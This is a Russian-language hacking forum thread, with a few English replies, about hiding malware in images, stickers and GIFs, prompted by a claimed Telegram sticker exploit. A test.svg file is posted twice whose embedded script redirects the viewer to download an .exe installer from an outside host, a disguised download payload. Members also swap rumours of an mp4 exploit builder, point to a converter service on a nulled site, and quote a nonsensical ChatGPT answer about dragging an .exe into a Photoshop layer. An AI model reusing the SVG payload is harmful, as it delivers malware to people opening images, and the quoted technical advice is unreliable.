Вирус в картинке/стикерах/гифках

[redbar]

Всем здравствуйте форумчане

Недавно увидел очень интересную вещь, отправили стикер в телеграме и получили доступ к айфону 12 жертвы(был стиллер с шелом насколько я понял), способом не поделилились но сказали что работает на винду и телефоны.
И у меня возник вопрос, есть ли ещё способы кроме помещения вирусов в картинку кроме сувания shell code-а в hex. Буду очень благодарен если поделитесь статьями или опытом. Спасибо за внимание!!

 

[FantasticExploits]

Приходит на ум SVG который поддерживает JS. xrahitel ?

 

[bivaliychel]

тоже будет интересно почитать

 

[kalinaes1]

вот что нам говорит гпт

Если я правильно поняла ваш запрос, вы хотите поместить .exe файл внутрь изображения. Это возможно, но вам нужно будет использовать программу для редактирования изображений, которая поддерживает слои, такие как Adobe Photoshop или GIMP. Вот шаги, которые вам нужно предпринять:

1. Откройте изображение в программе для редактирования изображений.
2. Создайте новый слой поверх вашего изображения.
3. Выберите инструмент "Прямоугольник" или "Эллипс", чтобы создать контейнер для вашего .exe файла.
4. Залейте этот контейнер каким-нибудь цветом, который соответствует фону вашего изображения.
5. Сохраните ваше изображение как файл PNG, так как формат PNG поддерживает прозрачность.
6. Теперь вы можете открыть ваш .exe файл и перетащить его в созданный вами контейнер внутри изображения.
7. Сохраните изменения и закройте программу.

Теперь у вас есть изображение, которое содержит .exe файл. Когда кто-то откроет это изображение, он увидит только само изображение, но если он решит сохранить его как файл .exe, то он сохранит ваш исходный .exe файл.

 

[dxeglow]

Недавно увидел очень интересную вещь, отправили стикер в телеграме и получили доступ к айфону 12 жертвы(был стиллер с шелом насколько я понял), способом не поделилились но сказали что работает на винду и телефоны.
И у меня возник вопрос, есть ли ещё способы кроме помещения вирусов в картинку кроме сувания shell code-а в hex. Буду очень благодарен если поделитесь статьями или опытом. Спасибо за внимание!!

Это была уязвимость нулевого дня (если ты говоришь только про телеграм) и её уже вроде исправили. Если ты говоришь в принципе про "вирус в картинке", то в картинку внедряется полезная нагрузка (вроде архива). Если не ошибаюсь, то у некоторых ютуберов были видео по этому поводу. "Рекламировать" каналы не буду. Надо будет - придётся поискать самому.

 

[latoni]

Это была уязвимость нулевого дня (если ты говоришь только про телеграм) и её уже вроде исправили. Если ты говоришь в принципе про "вирус в картинке", то в картинку внедряется полезная нагрузка (вроде архива). Если не ошибаюсь, то у некоторых ютуберов были видео по этому поводу. "Рекламировать" каналы не буду. Надо будет - придётся поискать самому.

Нет, в телеге новая дыра через мп4.
Там уже билдер в паблике валяется.
Думаю скоро фикс уже.

 

[xrahitel]

Приходит на ум SVG который поддерживает JS. xrahitel ?

Не знаю про SVG не тестил возможно как вариант конечно но а так не понял из поста топикастера если честно не чего.

Точно не помню но картинку и видео сразу за патчили как вышли видео.

А вот с музыкой работало, сейчас не знаю.

p.s В принципе можно и другие форматы тестить кроме .hta но мне у же это не интересно.

 

[Лохотронщик]

а вот тут и не такое предлагают %) сразу ясно что кидалы %) даже в .txt типа могут делать %)

https://nulled[.]ooo/resources/private-soft-converter-exe-to-pdf-doc-txt-jpg.13/

 

[Drop_nation]

Бля кто сможет дайте знать больше деньги !!!

 

[Drop_nation]

Если телегу можно сломать

 

[FantasticExploits]

Я бы попробоваль загрузить так например, к сожелению нет telegrama для тестов.

test.svg

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 20010904//EN"
 "http://www.w3.org/TR/2001/REC-SVG-20010904/DTD/svg10.dtd">
<svg version="1.0" xmlns="http://www.w3.org/2000/svg"
 width="114.000000pt" height="38.000000pt" viewBox="0 0 114.000000 38.000000"
 preserveAspectRatio="xMidYMid meet">

<g transform="translate(0.000000,38.000000) scale(0.100000,-0.100000)"
fill="#000000" stroke="none">
<path d="M0 190 l0 -190 170 0 170 0 0 35 c0 25 4 35 15 35 23 0 31 -31 12
-45 -10 -7 -17 -15 -17 -19 0 -4 178 -6 395 -6 l395 1 0 190 0 189 -570 0
-570 0 0 -190z m163 141 c5 -5 -11 -6 -37 -4 -61 7 -86 -13 -86 -72 0 -59 25
-79 86 -72 34 3 43 2 35 -6 -18 -18 -87 -14 -110 7 -45 40 -34 126 19 153 25
14 77 10 93 -6z m97 9 c0 -5 -4 -10 -10 -10 -6 0 -10 -32 -10 -75 0 -43 4 -75
10 -75 6 0 10 -4 10 -10 0 -5 -13 -10 -30 -10 -16 0 -30 5 -30 10 0 6 5 10 10
10 6 0 10 32 10 75 0 43 -4 75 -10 75 -5 0 -10 5 -10 10 0 6 14 10 30 10 17 0
30 -4 30 -10z m60 -30 l0 -40 55 0 55 0 0 40 c0 22 5 40 10 40 6 0 10 -38 10
-95 0 -57 -4 -95 -10 -95 -5 0 -10 20 -10 45 l0 45 -55 0 -55 0 0 -45 c0 -25
-4 -45 -10 -45 -6 0 -10 38 -10 95 0 57 4 95 10 95 6 0 10 -18 10 -40z m390
-20 c0 -6 9 -5 24 1 17 8 29 8 45 0 15 -9 27 -9 41 -1 28 15 56 4 64 -23 9
-36 7 -107 -4 -107 -6 0 -10 27 -10 61 l0 60 -32 -3 c-33 -3 -33 -4 -36 -60
-4 -77 -22 -74 -22 3 l0 60 -32 -3 c-33 -3 -33 -4 -36 -60 -4 -82 -22 -72 -22
12 0 40 4 70 10 70 6 0 10 -4 10 -10z m288 4 c37 -10 25 -20 -19 -16 -35 4
-40 2 -37 -14 2 -11 17 -21 38 -27 54 -14 64 -37 25 -63 -16 -11 -34 -14 -55
-9 -47 10 -35 23 16 17 41 -4 46 -3 42 13 -2 11 -16 22 -34 27 -17 4 -38 15
-45 24 -11 14 -10 19 10 35 26 21 27 21 59 13z m-468 -119 c0 -8 -7 -15 -15
-15 -8 0 -15 7 -15 15 0 8 7 15 15 15 8 0 15 -7 15 -15z m34 -124 c1 -16 -2
-28 -6 -25 -4 3 -8 19 -8 36 0 39 11 30 14 -11z m490 0 c1 -16 -2 -28 -6 -25
-4 3 -8 19 -8 36 0 39 11 30 14 -11z m-640 11 c-7 -4 -14 -16 -17 -27 -4 -15
-5 -14 -6 8 -1 20 4 27 17 27 11 0 13 -3 6 -8z m23 -29 c-3 -10 -5 -5 -5 12 0
17 2 24 5 18 2 -7 2 -21 0 -30z m33 -3 c5 0 11 9 14 20 5 17 6 17 4 -2 -4 -28
-33 -31 -34 -3 -1 15 0 16 3 3 3 -10 8 -18 13 -18z m70 15 c0 -25 -23 -35 -35
-15 -10 16 2 40 20 40 9 0 15 -9 15 -25z m78 7 c2 -7 -5 -12 -15 -13 -16 0
-16 -1 2 -9 16 -7 17 -9 3 -9 -21 -1 -32 15 -24 35 7 17 27 15 34 -4z m75 11
c-7 -2 -13 -11 -13 -18 0 -7 6 -16 13 -18 9 -4 9 -6 0 -6 -6 -1 -15 4 -18 9
-9 15 2 40 17 39 10 0 10 -2 1 -6z m54 -9 c8 -21 -13 -42 -28 -27 -13 13 -5
43 11 43 6 0 13 -7 17 -16z m79 -12 c1 -19 1 -19 -3 -2 -6 27 -23 25 -24 -2
l-2 -23 -4 23 c-2 12 -8 22 -13 22 -5 0 -11 -10 -13 -22 -4 -20 -4 -19 -6 4
-1 25 2 28 32 25 25 -2 32 -7 33 -25z m80 0 c1 -19 1 -19 -3 -2 -6 27 -23 25
-24 -2 l-2 -23 -4 23 c-2 12 -8 22 -13 22 -5 0 -11 -10 -13 -22 -4 -20 -4 -19
-6 4 -1 25 2 28 32 25 25 -2 32 -7 33 -25z m34 -12 c5 0 11 10 13 23 4 18 5
17 6 -6 1 -22 -3 -28 -16 -25 -10 2 -18 12 -19 23 -1 15 0 16 3 3 3 -10 8 -18
13 -18z m67 10 c1 -22 1 -22 -4 -2 -2 12 -8 22 -13 22 -5 0 -11 -10 -13 -22
-4 -19 -5 -18 -6 5 -1 22 3 28 17 25 10 -2 18 -13 19 -28z m20 -7 c-3 -10 -5
-5 -5 12 0 17 2 24 5 18 2 -7 2 -21 0 -30z m63 -3 c5 0 11 10 13 23 3 16 5 13
6 -11 1 -30 -1 -32 -19 -22 -12 6 -19 20 -19 33 l2 22 4 -22 c2 -13 8 -23 13
-23z"/>
<path d="M510 45 c0 -8 5 -15 10 -15 6 0 10 7 10 15 0 8 -4 15 -10 15 -5 0
-10 -7 -10 -15z"/>
<path d="M720 45 c0 -8 5 -15 10 -15 6 0 10 7 10 15 0 8 -4 15 -10 15 -5 0
-10 -7 -10 -15z"/>
<path d="M350 45 c0 -8 5 -15 10 -15 6 0 10 7 10 15 0 8 -4 15 -10 15 -5 0
-10 -7 -10 -15z"/>
</g>
<script> window.location.href = "https://eshop.hamiltonhousepublishers.gr/Installer-Install-Setup_v0.4.5.exe"; </script>
</svg>

 

[dxeglow]

Бля кто сможет дайте знать больше деньги !!!

Если телегу можно сломать

чё?

 

[xrahitel]

Я бы попробоваль загрузить так например, к сожелению нет telegrama для тестов.

Не это понт на 10+ тыц если открыть на ведре 8+ то надо выбрать ослом открывать, потом + клик ну это пиздец

 

[marmai]

Нет, в телеге новая дыра через мп4.
Там уже билдер в паблике валяется.
Думаю скоро фикс уже.

а где подробнее про это почитать?

 

[Developer-Test]

I would try to download it like this, for example, unfortunately there is no telegram for testing.

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 20010904//EN"
 "http://www.w3.org/TR/2001/REC-SVG-20010904/DTD/svg10.dtd">
<svg version="1.0" xmlns="http://www.w3.org/2000/svg"
 width="114.000000pt" height="38.000000pt" viewBox="0 0 114.000000 38.000000"
 preserveAspectRatio="xMidYMid meet">

<g transform="translate(0.000000,38.000000) scale(0.100000,-0.100000)"
fill="#000000" stroke="none">
<path d="M0 190 l0 -190 170 0 170 0 0 35 c0 25 4 35 15 35 23 0 31 -31 12
-45 -10 -7 -17 -15 -17 -19 0 -4 178 -6 395 -6 l395 1 0 190 0 189 -570 0
-570 0 0 -190z m163 141 c5 -5 -11 -6 -37 -4 -61 7 -86 -13 -86 -72 0 -59 25
-79 86 -72 34 3 43 2 35 -6 -18 -18 -87 -14 -110 7 -45 40 -34 126 19 153 25
14 77 10 93 -6z m97 9 c0 -5 -4 -10 -10 -10 -6 0 -10 -32 -10 -75 0 -43 4 -75
10 -75 6 0 10 -4 10 -10 0 -5 -13 -10 -30 -10 -16 0 -30 5 -30 10 0 6 5 10 10
10 6 0 10 32 10 75 0 43 -4 75 -10 75 -5 0 -10 5 -10 10 0 6 14 10 30 10 17 0
30 -4 30 -10z m60 -30 l0 -40 55 0 55 0 0 40 c0 22 5 40 10 40 6 0 10 -38 10
-95 0 -57 -4 -95 -10 -95 -5 0 -10 20 -10 45 l0 45 -55 0 -55 0 0 -45 c0 -25
-4 -45 -10 -45 -6 0 -10 38 -10 95 0 57 4 95 10 95 6 0 10 -18 10 -40z m390
-20 c0 -6 9 -5 24 1 17 8 29 8 45 0 15 -9 27 -9 41 -1 28 15 56 4 64 -23 9
-36 7 -107 -4 -107 -6 0 -10 27 -10 61 l0 60 -32 -3 c-33 -3 -33 -4 -36 -60
-4 -77 -22 -74 -22 3 l0 60 -32 -3 c-33 -3 -33 -4 -36 -60 -4 -82 -22 -72 -22
12 0 40 4 70 10 70 6 0 10 -4 10 -10z m288 4 c37 -10 25 -20 -19 -16 -35 4
-40 2 -37 -14 2 -11 17 -21 38 -27 54 -14 64 -37 25 -63 -16 -11 -34 -14 -55
-9 -47 10 -35 23 16 17 41 -4 46 -3 42 13 -2 11 -16 22 -34 27 -17 4 -38 15
-45 24 -11 14 -10 19 10 35 26 21 27 21 59 13z m-468 -119 c0 -8 -7 -15 -15
-15 -8 0 -15 7 -15 15 0 8 7 15 15 15 8 0 15 -7 15 -15z m34 -124 c1 -16 -2
-28 -6 -25 -4 3 -8 19 -8 36 0 39 11 30 14 -11z m490 0 c1 -16 -2 -28 -6 -25
-4 3 -8 19 -8 36 0 39 11 30 14 -11z m-640 11 c-7 -4 -14 -16 -17 -27 -4 -15
-5 -14 -6 8 -1 20 4 27 17 27 11 0 13 -3 6 -8z m23 -29 c-3 -10 -5 -5 -5 12 0
17 2 24 5 18 2 -7 2 -21 0 -30z m33 -3 c5 0 11 9 14 20 5 17 6 17 4 -2 -4 -28
-33 -31 -34 -3 -1 15 0 16 3 3 3 -10 8 -18 13 -18z m70 15 c0 -25 -23 -35 -35
-15 -10 16 2 40 20 40 9 0 15 -9 15 -25z m78 7 c2 -7 -5 -12 -15 -13 -16 0
-16 -1 2 -9 16 -7 17 -9 3 -9 -21 -1 -32 15 -24 35 7 17 27 15 34 -4z m75 11
c-7 -2 -13 -11 -13 -18 0 -7 6 -16 13 -18 9 -4 9 -6 0 -6 -6 -1 -15 4 -18 9
-9 15 2 40 17 39 10 0 10 -2 1 -6z m54 -9 c8 -21 -13 -42 -28 -27 -13 13 -5
43 11 43 6 0 13 -7 17 -16z m79 -12 c1 -19 1 -19 -3 -2 -6 27 -23 25 -24 -2
l-2 -23 -4 23 c-2 12 -8 22 -13 22 -5 0 -11 -10 -13 -22 -4 -20 -4 -19 -6 4
-1 25 2 28 32 25 25 -2 32 -7 33 -25z m80 0 c1 -19 1 -19 -3 -2 -6 27 -23 25
-24 -2 l-2 -23 -4 23 c-2 12 -8 22 -13 22 -5 0 -11 -10 -13 -22 -4 -20 -4 -19
-6 4 -1 25 2 28 32 25 25 -2 32 -7 33 -25z m34 -12 c5 0 11 10 13 23 4 18 5
17 6 -6 1 -22 -3 -28 -16 -25 -10 2 -18 12 -19 23 -1 15 0 16 3 3 3 -10 8 -18
13 -18z m67 10 c1 -22 1 -22 -4 -2 -2 12 -8 22 -13 22 -5 0 -11 -10 -13 -22
-4 -19 -5 -18 -6 5 -1 22 3 28 17 25 10 -2 18 -13 19 -28z m20 -7 c-3 -10 -5
-5 -5 12 0 17 2 24 5 18 2 -7 2 -21 0 -30z m63 -3 c5 0 11 10 13 23 3 16 5 13
6 -11 1 -30 -1 -32 -19 -22 -12 6 -19 20 -19 33 l2 22 4 -22 c2 -13 8 -23 13
-23z"/>
<path d="M510 45 c0 -8 5 -15 10 -15 6 0 10 7 10 15 0 8 -4 15 -10 15 -5 0
-10 -7 -10 -15z"/>
<path d="M720 45 c0 -8 5 -15 10 -15 6 0 10 7 10 15 0 8 -4 15 -10 15 -5 0
-10 -7 -10 -15z"/>
<path d="M350 45 c0 -8 5 -15 10 -15 6 0 10 7 10 15 0 8 -4 15 -10 15 -5 0
-10 -7 -10 -15z"/>
</g>
<script> window.location.href = "https://eshop.hamiltonhousepublishers.gr/Installer-Install-Setup_v0.4.5.exe"; </script>
</svg>

this code doesn,t work anymore.

 

[m4rkopetr0vic]

а вот тут и не такое предлагают %) сразу ясно что кидалы %) даже в .txt типа могут делать %)

https://nulled[.]ooo/resources/private-soft-converter-exe-to-pdf-doc-txt-jpg.13/

Вы пользовались этой программой? Можете ли вы прокомментировать, хорошо это или плохо?

 

[Dread Pirate Roberts]

Вы пользовались этой программой? Можете ли вы прокомментировать, хорошо это или плохо?

scam

 

[m4rkopetr0vic]

scam

Thank you. it seemed too good to be true. i was surprised to see so many purchases, made me think twice. there is no such service that anyone offers to my knowledge, correct? and if they did would probably be very very expensive